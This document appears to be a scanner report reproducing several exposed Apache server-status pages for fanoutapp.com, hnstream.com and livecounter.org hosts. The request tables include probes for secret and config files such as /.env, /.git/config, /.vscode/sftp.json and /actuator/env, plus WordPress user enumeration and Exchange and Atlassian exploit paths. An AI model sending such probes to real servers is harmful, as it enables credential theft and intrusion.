0-2925717050/11/485_ 0.310378860.00.031.38 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-2925717050/11/430_ 0.311364200.00.020.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-2925717050/8/463_ 0.310376890.00.011.19 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-29257170511/9/463W 0.270065030.00.011.35 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-2925717050/6/461_ 0.301861269700.00.011.07 104.156.83.40http/1.1api.hnstream.com:8000GET /comments/items/?since=cursor:42982264 HTTP/1.1 0-2925717050/10/453_ 0.301120171440.00.021.68 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2925717050/10/470_ 0.301860277100.00.021.27 104.156.83.40http/1.1api.hnstream.com:8000GET /comments/items/?since=cursor:42982264 HTTP/1.1 0-2925717050/8/439_ 0.249761869550.00.021.17 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2925717050/10/463_ 0.30981572270.00.021.43 167.82.132.35http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2925717050/8/449_ 0.281855367540.00.020.93 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /favicon.ico HTTP/1.1 0-2925717050/8/467_ 0.241115677980.00.021.26 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2925717050/5/447_ 0.310379020.00.011.23 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-2925717050/11/463_ 0.30645578170.00.021.31 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2925717050/10/448_ 0.30643185600.00.011.08 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2925717050/8/459_ 0.29638262770.00.021.49 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /robots.txt HTTP/1.1 0-2925717050/7/462_ 0.266141762770.00.041.34 206.168.34.198http/1.1api.hnstream.com:8000PRI * HTTP/2.0 0-2925717050/8/457_ 0.30614163520.00.021.06 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2925717050/8/451_ 0.20640071420.00.011.15 206.168.34.198http/1.1 0-2925717050/8/465_ 0.3043164040.00.021.10 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-2925717050/10/439_ 0.29609365940.00.021.20 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /sitemap.xml HTTP/1.1 0-2925717050/12/481_ 0.303459600.00.021.21 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-2925717050/7/458_ 0.312572980.00.021.47 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-25-0/0/244. 0.00302844242210.00.000.82 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/237. 0.003028443346190.00.000.68 167.82.173.44http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-25-0/0/236. 0.00302844033150.00.000.85 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/codemirror.css HTTP/1.1 1-25-0/0/238. 0.003028442230670.00.000.89 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/codemirror.js HTTP/1.1 1-25-0/0/256. 0.00302844648420.00.000.82 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/jquery-3.1.1.min.js HTTP/1.1 1-25-0/0/251. 0.003028441738770.00.000.84 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/259. 0.00302844143320.00.001.12 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/235. 0.00302844634720.00.000.68 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/236. 0.00302844636150.00.000.65 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-25-0/0/236. 0.00302844642540.00.000.90 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-25-0/0/242. 0.00302844648490.00.000.92 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/232. 0.00302844138480.00.000.74 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/248. 0.00302844528040.00.000.61 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-25-0/0/230. 0.00302844827550.00.000.79 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-25-0/0/259. 0.00302844639650.00.000.87 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/229. 0.00302844138810.00.000.65 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/249. 0.00302844136440.00.000.77 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-25-0/0/247. 0.00302844645950.00.000.97 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/248. 0.003028441737990.00.000.84 140.248.75.174http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-25-0/0/228. 0.003028441936650.00.000.64 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-25-0/0/248. 0.00302844635120.00.000.76 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/241. 0.003028441234010.00.000.85 157.52.117.82http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-25-0/0/234. 0.003028441628370.00.000.93 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/234. 0.00302844332870.00.000.62 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/ot.js HTTP/1.1 1-25-0/0/249. 0.00302844732690.00.000.72 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf9c85dc85
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Thursday, 06-Feb-2025 11:55:00 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 28 Parent Server MPM Generation: 27 Server uptime: 26 days 13 hours 16 minutes 3 seconds Server load: 0.22 0.20 0.18 Total accesses: 25264 - Total Traffic: 71.2 MB - Total Duration: 394761 CPU Usage: u38.68 s65.54 cu527.78 cs199.25 - .0362% CPU load .011 requests/sec - 32 B/second - 2957 B/request - 15.6254 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02393523no0yes124000 22393524no0yes025000 Sum200 149000 ____________________W____.........................______________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2723935230/12/423_ 0.2922081930.00.100.95 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-2723935230/6/420_ 0.292574790.00.011.35 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-2723935230/12/413_ 0.292360360.00.091.25 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-2723935230/7/452_ 0.292376930.00.021.23 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-2723935230/12/396_ 0.292360990.00.030.80 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-2723935230/10/434_ 0.2911468940.00.021.11 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-2723935230/11/426_ 0.291362600.00.021.28 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-2723935230/8/434_ 0.291463060.00.021.02 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 0-2723935230/10/418_ 0.291369220.00.021.45 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-2723935230/9/441_ 0.24101374610.00.091.21 157.52.67.41http/1.1api.hnstream.com:8000GET /comments/items/?since=cursor:42961043 HTTP/1.1 0-2723935230/9/399_ 0.291367290.00.021.09 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-2723935230/10/432_ 0.291370590.00.021.28 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-2723935230/9/412_ 0.301365590.00.020.86 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-2723935230/11/438_ 0.310376490.00.031.20 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-2723935230/11/422_ 0.300376770.00.031.18 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-2723935230/13/431_ 0.310370820.00.031.24 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-2723935230/9/415_ 0.2923178160.00.021.01 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-2723935230/7/419_ 0.310356150.00.021.26 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-2723935230/7/433_ 0.310360560.00.011.26 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-2723935230/12/422_ 0.310461690.00.020.99 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-27239352311/6/418W 0.290070250.00.021.06 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-2723935230/9/432_ 0.2748418461830.00.021.02 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /robots.txt HTTP/1.1 0-2723935230/7/404_ 0.29379663320.00.021.12 167.82.132.35http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2723935230/9/446_ 0.27374357560.00.021.14 157.52.67.41http/1.1api.hnstream.com:8000GET /comments/items/?since=cursor:42961167 HTTP/1.1 0-2723935230/7/423_ 0.29106065710.00.011.36 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-25-0/0/244. 0.00129276242210.00.000.82 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/237. 0.001292763346190.00.000.68 167.82.173.44http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-25-0/0/236. 0.00129276033150.00.000.85 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/codemirror.css HTTP/1.1 1-25-0/0/238. 0.001292762230670.00.000.89 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/codemirror.js HTTP/1.1 1-25-0/0/256. 0.00129276648420.00.000.82 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/jquery-3.1.1.min.js HTTP/1.1 1-25-0/0/251. 0.001292761738770.00.000.84 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/259. 0.00129276143320.00.001.12 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/235. 0.00129276634720.00.000.68 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/236. 0.00129276636150.00.000.65 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-25-0/0/236. 0.00129276642540.00.000.90 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-25-0/0/242. 0.00129276648490.00.000.92 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/232. 0.00129276138480.00.000.74 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/248. 0.00129276528040.00.000.61 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-25-0/0/230. 0.00129276827550.00.000.79 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-25-0/0/259. 0.00129276639650.00.000.87 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/229. 0.00129276138810.00.000.65 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/249. 0.00129276136440.00.000.77 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-25-0/0/247. 0.00129276645950.00.000.97 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/248. 0.001292761737990.00.000.84 140.248.75.174http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-25-0/0/228. 0.001292761936650.00.000.64 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-25-0/0/248. 0.00129276635120.00.000.76 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/241. 0.001292761234010.00.000.85 157.52.117.82http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-25-0/0/234. 0.001292761628370.00.000.93 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/234. 0.00129276332870.00.000.62 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/ot.js HTTP/1.1 1-25-0/0/249. 0.00129276732690.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfa646469b
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Tuesday, 04-Feb-2025 11:01:59 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 26 Parent Server MPM Generation: 25 Server uptime: 24 days 12 hours 23 minutes 1 second Server load: 0.08 0.16 0.17 Total accesses: 23729 - Total Traffic: 66.8 MB - Total Duration: 370803 CPU Usage: u35.2 s61.2 cu485.89 cs183.72 - .0362% CPU load .0112 requests/sec - 33 B/second - 2949 B/request - 15.6266 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02215582no1yes124000 12215581no0yes025000 Sum201 149000 ____W_____________________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2522155820/11/385_ 0.28437473600.00.020.79 140.248.83.59http/1.1api.hnstream.com:8000GET /comments/stream//%22http://www.datascraping.co/%22 HTTP/1. 0-2522155820/10/394_ 0.310371090.00.031.29 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-2522155820/13/380_ 0.310357350.00.041.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-2522155820/13/419_ 0.301801171510.00.171.16 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-25221558211/7/359W 0.280057750.00.020.72 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-2522155820/7/400_ 0.281648463410.00.011.03 140.248.83.20http/1.1api.hnstream.com:8000GET /comments/stream//%22http://nathansuniversity.com//%22 HTTP 0-2522155820/5/390_ 0.281796453630.00.021.20 140.248.83.68http/1.1api.hnstream.com:8000GET /comments/stream//%22http://everything2.com/title/Women+are 0-2522155820/11/398_ 0.301653658570.00.020.93 167.82.132.35http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2522155820/11/380_ 0.301217664660.00.021.28 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2522155820/10/411_ 0.30442660950.00.021.07 167.82.132.35http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2522155820/8/365_ 0.281212455160.00.021.01 157.52.108.137http/1.1api.hnstream.com:8000GET /comments/stream//%22http://plasticbaglaws.org/legislation/ 0-2522155820/7/399_ 0.2510431468880.00.091.20 157.52.108.32http/1.1api.hnstream.com:8000GET /robots.txt HTTP/1.1 0-2522155820/9/378_ 0.311360940.00.020.78 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-2522155820/8/403_ 0.28610674030.00.021.12 157.52.108.72http/1.1api.hnstream.com:8000GET /comments/stream//%22http://turing.deepart.io:3838//%22 HTT 0-2522155820/9/392_ 0.297471680.00.021.10 140.248.83.64http/1.1api.hnstream.com:8000GET /comments/stream//%22http://www.mermeliz.com/files/summary/ 0-2522155820/11/395_ 0.301048665790.00.021.07 167.82.132.35http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2522155820/11/383_ 0.311373850.00.030.94 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-2522155820/11/388_ 0.312450360.00.031.19 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-2522155820/9/397_ 0.310354780.00.021.17 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-2522155820/10/384_ 0.3012557530.00.020.82 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2522155820/9/391_ 0.31254166610.00.020.92 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-2522155820/9/399_ 0.310355070.00.020.95 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-2522155820/10/371_ 0.306151560770.00.021.02 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2522155820/11/414_ 0.311353680.00.021.05 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-2522155820/9/393_ 0.311361290.00.021.29 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-2522155810/5/236_ 0.222253441820.00.010.78 157.52.108.99http/1.1api.hnstream.com:8000GET /comments/stream//%22http://arstechnica.com/apple/2012/01/m 1-2522155810/8/228_ 0.232258645130.00.010.63 167.82.132.35http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-2522155810/4/228_ 0.182344632650.00.010.74 167.82.132.35http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-2522155810/8/228_ 0.222349429930.00.020.76 140.248.83.59http/1.1api.hnstream.com:8000GET /comments/stream//%22http://www.rapp.org/archives/2015/12/n 1-2522155810/9/248_ 0.250348090.00.020.77 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-2522155810/10/243_ 0.232015438360.00.030.82 157.52.108.108http/1.1api.hnstream.com:8000GET /comments/stream//%22https://www.gov.uk/government/publicat 1-2522155810/5/252_ 0.222020442970.00.021.11 157.52.108.63http/1.1api.hnstream.com:8000GET /comments/stream//%22http://i.imgur.com/XCHQstM.png/%22 HTT 1-2522155810/10/227_ 0.232043434390.00.030.67 157.52.108.90http/1.1api.hnstream.com:8000GET /comments/stream//%22https://github.com/bijection/g9/blob/m 1-2522155810/5/230_ 0.222038435910.00.010.64 157.52.108.120http/1.1api.hnstream.com:8000GET /comments/stream//%22http://docs.aws.amazon.com/AWSCloudFor 1-2522155810/10/227_ 0.232029442100.00.020.88 157.52.108.140http/1.1api.hnstream.com:8000GET /comments/stream//%22https://github.com/ethereum/mist/relea 1-2522155810/5/233_ 0.232025448120.00.010.90 140.248.83.26http/1.1api.hnstream.com:8000GET /comments/stream//%22https://github.com/lucybot/lucy-consol 1-2522155810/8/225_ 0.202024638110.00.020.73 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2522155810/10/243_ 0.25226027770.00.020.60 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-2522155810/8/226_ 0.24462027390.00.010.78 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 1-2522155810/6/251_ 0.221813439380.00.010.79 140.248.83.28http/1.1api.hnstream.com:8000GET /comments/stream//%22http://sh1.webring.com/people/gu/um_37 1-2522155810/9/223_ 0.241818638580.00.020.64 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2522155810/3/243_ 0.172214535650.00.010.68 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 1-2522155810/9/239_ 0.24462045380.00.020.95 127.0.0.1http/1.1hnstream.com:8000GET /favicon.ico HTTP/1.1 1-2522155810/5/241_ 0.222010337590.00.020.82 157.52.108.103http/1.1api.hnstream.com:8000GET /comments/stream//%22http://ionide.io/%22 HTTP/1.1 1-2522155810/6/223_ 0.17457636190.00.010.56 167.82.132.35http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-2522155810/8/240_ 0.2511634720.00.020.75 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-2522155810/10/232_ 0.2522233370.00.100.83 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-2522155810/3/230_ 0.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfb3c44452
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Sunday, 02-Feb-2025 06:02:18 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 24 Parent Server MPM Generation: 23 Server uptime: 22 days 7 hours 23 minutes 21 seconds Server load: 0.23 0.28 0.22 Total accesses: 21952 - Total Traffic: 61.7 MB - Total Duration: 343951 CPU Usage: u31.84 s55.7 cu444.64 cs168.77 - .0364% CPU load .0114 requests/sec - 33 B/second - 2948 B/request - 15.6683 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02033768no0yes025000 12033767no0yes124000 Sum200 149000 ___________________________________W______________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2320337680/4/348_ 0.1056201165850.00.010.71 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/3/354_ 0.095615366820.00.011.20 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-2320337680/4/347_ 0.095677353550.00.011.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-2320337680/4/378_ 0.1050621762120.00.010.93 140.248.75.122http/1.1api.hnstream.com:8000GET /robots.txt HTTP/1.1 0-2320337680/4/330_ 0.122936954110.00.010.65 140.248.74.29http/1.1api.livecounter.org:8000GET /robots.txt HTTP/1.1 0-2320337680/4/367_ 0.095057158430.00.010.95 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-2320337680/4/359_ 0.104929648770.00.011.06 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/4/364_ 0.094924349340.00.010.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-2320337680/4/342_ 0.104476159000.00.011.21 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2320337680/4/372_ 0.094471355640.00.010.99 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.env HTTP/1.1 0-2320337680/4/334_ 0.104328650470.00.010.94 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/4/365_ 0.094323359720.00.011.06 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /s/1393e213e2130313e2135313/_/;/META-INF/maven/com.atlassia 0-2320337680/4/343_ 0.104222555710.00.010.71 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/3/366_ 0.094217361810.00.011.04 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 0-2320337680/5/363_ 0.123258060770.00.011.03 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-2320337680/2/352_ 0.092931659320.00.000.98 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/4/346_ 0.12341568130.00.010.85 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/2/346_ 0.093253343190.00.000.95 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-2320337680/4/362_ 0.122759750950.00.001.09 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/2/351_ 0.092754154030.00.000.74 206.168.34.217http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2320337680/4/360_ 0.122345657580.00.010.86 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/4/364_ 0.1023401450140.00.010.87 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/4/339_ 0.121554657390.00.010.94 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/4/375_ 0.10336150180.00.010.98 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2320337680/4/354_ 0.101549557840.00.011.23 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2320337670/6/206_ 0.191339500.00.010.65 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.env HTTP/1.1 1-2320337670/6/195_ 0.191343650.00.070.51 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.git/config HTTP/1.1 1-2320337670/9/194_ 0.201330870.00.080.67 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-2320337670/6/193_ 0.201328040.00.020.54 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /s/1393e213e2130313e2135313/_/;/META-INF/maven/com.atlassia 1-2320337670/9/211_ 0.200339800.00.020.69 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /config.json HTTP/1.1 1-2320337670/6/207_ 0.200333270.00.080.74 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 1-2320337670/9/215_ 0.200338260.00.090.93 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /info.php HTTP/1.1 1-2320337670/7/191_ 0.200331330.00.020.58 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-2320337670/9/194_ 0.200128850.00.100.49 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-2320337670/8/192_ 0.200338490.00.020.80 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-23203376711/7/197W 0.180039550.00.020.80 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-2320337670/5/189_ 0.182334400.00.010.64 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-2320337670/8/203_ 0.182322730.00.010.51 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 1-2320337670/5/191_ 0.192323110.00.010.71 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-2320337670/9/212_ 0.192334500.00.020.63 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-2320337670/5/184_ 0.192333240.00.010.55 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-2320337670/7/214_ 0.192330380.00.020.63 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-2320337670/7/200_ 0.192334990.00.020.87 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-2320337670/7/206_ 0.192333330.00.020.75 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET 